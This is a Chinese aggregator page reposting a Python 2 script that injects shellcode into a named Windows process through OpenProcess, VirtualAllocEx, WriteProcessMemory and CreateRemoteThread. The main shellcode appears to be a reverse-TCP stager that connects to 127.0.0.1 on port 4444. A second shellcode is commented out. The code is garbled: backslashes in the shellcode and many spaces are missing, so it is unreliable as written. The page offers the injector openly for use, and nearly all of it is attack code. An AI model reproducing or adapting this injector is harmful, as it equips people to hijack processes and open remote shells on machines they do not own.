概述
// 转自: https://blog.csdn.net/Jailman/article/details/77573990
importsysimportpsutilimportctypesfrom ctypes import *PAGE_EXECUTE_READWRITE= 0x00000040PROCESS_ALL_ACCESS= ( 0x000F0000 | 0x00100000 | 0xFFF)
VIRTUAL_MEM= ( 0x1000 | 0x2000)
kernel32=windll.kernel32
pName= sys.argv[1]if not sys.argv[1]:print "Code Injector: ./code_injector.py "sys.exit(0)#shellcode = #"x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42"#"x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03"#"x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b"#"x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e"#"x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c"#"x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74"#"x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe"#"x49x0bx31xc0x51x50xffxd7";
shellcode= ""shellcode+= "xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"shellcode+= "x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"shellcode+= "x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"shellcode+= "x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"shellcode+= "x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"shellcode+= "xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"shellcode+= "xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"shellcode+= "xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"shellcode+= "x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"shellcode+= "x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"shellcode+= "x5fx5ax8bx12xebx8dx5dx68x33x32x00x00x68"shellcode+= "x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8"shellcode+= "x90x01x00x00x29xc4x54x50x68x29x80x6bx00"shellcode+= "xffxd5x6ax05x68x7fx00x00x01x68x02x00x11"shellcode+= "x5cx89xe6x50x50x50x50x40x50x40x50x68xea"shellcode+= "x0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"shellcode+= "x74x61xffxd5x85xc0x74x0axffx4ex08x75xec"shellcode+= "xe8x61x00x00x00x6ax00x6ax04x56x57x68x02"shellcode+= "xd9xc8x5fxffxd5x83xf8x00x7ex36x8bx36x6a"shellcode+= "x40x68x00x10x00x00x56x6ax00x68x58xa4x53"shellcode+= "xe5xffxd5x93x53x6ax00x56x53x57x68x02xd9"shellcode+= "xc8x5fxffxd5x83xf8x00x7dx22x58x68x00x40"shellcode+= "x00x00x6ax00x50x68x0bx2fx0fx30xffxd5x57"shellcode+= "x68x75x6ex4dx61xffxd5x5ex5exffx0cx24xe9"shellcode+= "x71xffxffxffx01xc3x29xc6x75xc7xc3xbbxf0"shellcode+= "xb5xa2x56x6ax00x53xffxd5"code_size=len(shellcode)
TH32CS_SNAPPROCESS= 0x00000002
classPROCESSENTRY32(ctypes.Structure):
_fields_= [("dwSize", ctypes.c_ulong),
("cntUsage", ctypes.c_ulong),
("th32ProcessID", ctypes.c_ulong),
("th32DefaultHeapID", ctypes.c_ulong),
("th32ModuleID", ctypes.c_ulong),
("cntThreads", ctypes.c_ulong),
("th32ParentProcessID", ctypes.c_ulong),
("pcPriClassBase", ctypes.c_ulong),
("dwFlags", ctypes.c_ulong),
("szExeFile", ctypes.c_char * 260)]#def getProcPid(procName):#CreateToolhelp32Snapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot#Process32First = ctypes.windll.kernel32.Process32First#Process32Next = ctypes.windll.kernel32.Process32Next#CloseHandle = ctypes.windll.kernel32.CloseHandle
#hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
#pe32 = PROCESSENTRY32()#pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)#if Process32First(hProcessSnap,ctypes.byref(pe32)) == False:#return#if pe32.szExeFile == procName:#CloseHandle(hProcessSnap)#return pe32.th32ProcessID
#while True:##yield pe32 #save the pe32#if Process32Next(hProcessSnap,ctypes.byref(pe32)) == False:#break#if pe32.szExeFile == procName:#CloseHandle(hProcessSnap)#return pe32.th32ProcessID
#CloseHandle(hProcessSnap)
defgetProcName(pname):"""get process by name
return the first process if there are more than one"""
for proc inpsutil.process_iter():try:if proc.name().lower() ==pname.lower():return str(proc).split('=')[1].split(',')[0] #return if found one
exceptpsutil.AccessDenied:pass
exceptpsutil.NoSuchProcess:pass
returnNone
procPid=int(getProcName(pName))#procPid = 40560
printprocPid#Get a handle to the process we are injecting into.
h_process =kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, procPid )if noth_process:print "[*] Couldn't acquire a handle to PID: %s" %pid
sys.exit(0)#Allocate some space for the shellcode
arg_address =kernel32.VirtualAllocEx( h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)#Write out the shellcode
written =c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))#Now we create the remote thread and point it's entry routine#to be head of our shellcode
thread_id =c_ulong(0)if notkernel32.CreateRemoteThread(h_process,None,0,arg_address,None,0,byref(thread_id)):print "[*] Failed to inject process-killing shellcode. Exiting."sys.exit(0)print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value
最后
以上就是大气秋天为你收集整理的python 执行shellcode_windows平台上用python 远程线程注入,执行shellcode的全部内容,希望文章能够帮你解决python 执行shellcode_windows平台上用python 远程线程注入,执行shellcode所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复